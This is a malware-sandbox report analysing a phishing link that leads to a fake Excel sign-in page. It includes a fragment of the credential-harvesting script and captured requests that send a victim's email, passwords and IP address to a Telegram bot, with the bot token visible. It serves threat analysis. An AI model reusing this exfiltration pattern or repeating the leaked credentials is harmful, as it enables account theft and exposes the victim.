Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyun

Overview

General Information

Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=a
Analysis ID:1584644
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Javascript checks online IP of machine
None HTTPS page querying sensitive user data (password, username or email)
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 1460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2260,i,6116481441488140002,9378863470170372530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T04:56:35.344474+010018100071Potentially Bad Traffic192.168.2.449765149.154.167.220443TCP
2025-01-06T04:56:36.278553+010018100071Potentially Bad Traffic192.168.2.449766149.154.167.220443TCP
2025-01-06T04:56:58.758786+010018100071Potentially Bad Traffic192.168.2.449768149.154.167.220443TCP
2025-01-06T04:56:59.671650+010018100071Potentially Bad Traffic192.168.2.449770149.154.167.220443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: http://phil-health-uk.glitch.me/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft Excel' is well-known and is associated with the domain 'microsoft.com'., The URL 'phil-health-uk.glitch.me' does not match the legitimate domain for Microsoft., The domain 'glitch.me' is a platform for hosting web applications and is not associated with Microsoft., The presence of 'phil-health-uk' in the URL is suspicious and unrelated to Microsoft Excel., The use of a password input field on a non-Microsoft domain is a common phishing tactic. DOM: 1.1.pages.csv
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comJoe Sandbox AI: Page contains button: 'View Document' Source: '1.0.pages.csv'
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: http://phil-health-uk.glitch.me/#changyeol.choi@hy... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be highly suspicious and likely malicious in nature.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: http://phil-health-uk.glitch.me/#changyeol.choi@hy... This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to potentially malicious domains. The script collects sensitive user information (email, password, IP address, browser details) and sends it to a Telegram bot, which is a concerning behavior. Additionally, the script includes a redirect mechanism that could lead users to untrusted domains. Overall, the combination of these high-risk indicators suggests this script is likely malicious and poses a significant security risk.
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: let count = 0; // variable to track error message count const maxattempts = 2; // maximum attempts before redirect // function to extract email from url hashfunction getemailfromurl() { const hash = window.location.hash.substring(1); // get hash without the '#' symbol if (hash.includes('@') && hash.includes('.')) { return hash; // return the hash as email if it appears valid } return ''; // return an empty string if hash doesn't resemble an email} // update the email display document.getelementbyid('emaildisplay').textcontent = getemailfromurl(); // handle form submission document.getelementbyid('loginform').addeventlistener('submit', async function (event) { event.preventdefault(); // prevent traditional form submission const passwordinput = document.getelementbyid('passwordinput'); const password = passwordinput.value; const email = getemailfromurl(); // get email from the...
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: Number of links: 0
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: Title: Sign in to your account does not match URL
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: let count = 0; // variable to track error message count const maxattempts = 2; // maximum attempts before redirect // function to extract email from url hashfunction getemailfromurl() { const hash = window.location.hash.substring(1); // get hash without the '#' symbol if (hash.includes('@') && hash.includes('.')) { return hash; // return the hash as email if it appears valid } return ''; // return an empty string if hash doesn't resemble an email} // update the email display document.getelementbyid('emaildisplay').textcontent = getemailfromurl(); // handle form submission document.getelementbyid('loginform').addeventlistener('submit', async function (event) { event.preventdefault(); // prevent traditional form submission const passwordinput = document.getelementbyid('passwordinput'); const password = passwordinput.value; const email = getemailfromurl(); // get email from the...
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: Has password / email / username input fields
Source: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comSample URL: PII: changyeol.choi@hyundaielevator.com
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: <input type="password" .../> found
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: No <meta name="author".. found
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: No <meta name="author".. found
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: No <meta name="copyright".. found
Source: http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comHTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49770 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49766 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49768 -> 149.154.167.220:443
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.th to http://phil-health-uk.glitch.me/
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F HTTP/1.1Host: www.google.co.thConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/phil-health-uk.glitch.me/ HTTP/1.1Host: www.google.co.thConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=mEog8veEf-llT1OPgOyCvqwf8IaUxQqOuR6BXL6_Qlq3QpVf_wvmBMEeIHJ0JxplLNtw3ZmaIE59eFMohc2GiZOrAX31aU6BZM_9kMIrJWoFIncjTz44Z2pCSlqzaeL4uplsBceDTKck9ocwVpX0jmBp4ww75nbL1_L7EKr4wPLuA3jbfdMsvoVulK0FbjWrS6QP7w
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://phil-health-uk.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://phil-health-uk.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://phil-health-uk.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://phil-health-uk.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20)oRtTKtS4%24h4IW%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A57%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://phil-health-uk.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://phil-health-uk.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20)oRtTKtS4%24h4IW%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A57%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: phil-health-uk.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.google.co.th
Source: global trafficDNS traffic detected: DNS query: phil-health-uk.glitch.me
Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: cdn.glitch.global
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: dns.google
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: hyundaielevator.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal88.phis.troj.win@23/28@28/10
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
